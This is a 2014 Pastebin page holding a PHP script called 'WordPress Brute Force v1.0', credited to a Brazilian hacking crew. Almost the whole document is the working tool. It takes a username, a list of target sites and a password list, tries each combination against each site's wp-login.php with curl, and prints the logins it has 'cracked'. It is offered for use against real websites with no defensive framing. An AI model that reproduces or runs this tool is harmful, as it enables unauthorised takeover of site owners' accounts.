Advertisement
MrMakar0v

Wordpress Brute Force v1.0

Oct 1st, 2014
340
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.40 KB | None | 0 0
  1. <?php
  2.     /*
  3.      Coded by Makar0v Sn!p3r -
  4.          Reports bugs> Skype: Rillon.AlHussein
  5.          Não adicionar ao menos que seja sério :)
  6.          
  7.          Não remova os creditos skid!
  8.     */
  9.     echo "<body text='#FFFFFF' bgcolor='#000000'>
  10. <link rel='icon' type='image/ico' href='http://embed.ly/static/images/publishers/wp-logo-large.png'/>
  11. <title>WordPress BruteForce v1.0 [2014]</title>
  12. <form method='POST'>
  13.  
  14.     <center>
  15. <font face='Tahoma' size='10'>[#] WordPress Brute Force v1.0 [#] </font>
  16. <p>
  17.     <input type='text' name='username' value='Login'>
  18.     <input type='submit' name='start' value='Brute'>
  19.     <br>
  20.     <textarea cols='30' rows='10' name='websites'>http://www.site.com.br/</textarea>
  21.     <textarea cols='30' rows='10' name='password'>senha</textarea></p>
  22. <p><font face='Verdana' size='2'>Obs: Resultado aparecer em txt</font></p>
  23.     <style>
  24.  
  25.      <p dir='ltr' align='center'>
  26.   <textarea cols='22' class='area'  rows='14' name='username'></textarea>
  27.   <textarea cols='22' class='area'  rows='14' name='password'></textarea><br>
  28.  
  29.  
  30.   <br>
  31.     </style>";
  32.     $username = $_POST['username'];
  33.     $websites = explode("\n",$_POST['websites']);
  34.     $password = explode("\n",$_POST['password']);
  35.    
  36.     function brute($webs,$username,$pass) {
  37.     $curl = curl_init();
  38.     curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  39.     curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  40.     curl_setopt($curl,CURLOPT_COOKIEJAR,"Resultado.txt");
  41.     curl_setopt($curl,CURLOPT_COOKIEFILE,"Resultado.txt");
  42.     curl_setopt($curl,CURLOPT_URL,"$webs/wp-login.php");
  43.     curl_setopt($curl,CURLOPT_POSTFIELDS,"log=$username&pwd=$pass&wp-submit=Log+In&redirect_to=.$webs./wp-admin/&testcookie=1");
  44.     $brute = curl_exec($curl);
  45.         if(eregi('upload.php',$brute)) {
  46.             echo "<p><font face='Verdana' size='1'>[+] Crackeada : <font color='#008000'>$username</font>:<font color='#008000'>$pass</font>@<font color='#008000'>$webs</font> [+]</font></p>";
  47.         }
  48.     }
  49.     foreach($websites as $webs) {
  50.     foreach($password as $pass) {
  51.     brute($webs,$username,$pass);
  52.         } }
  53.     echo "<p><font face='Verdana' size='1'>
  54. +------------------------------------------------------------------------------------------------------------+</font></p>
  55. <p><font face='Verdana' size='3'>Coded By Makar0v Sn!p3r - zHacking Brasil Crew </font><font color='#00FF2F'></p>
  56. <p><font face='Verdana' size='2'>Greets: @r00t1ng - Yulle - DrakeSec - Br1337 - P&rlcK - Asor Hack Team and all members </font></p>
  57. </form>";
  58.  
  59. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement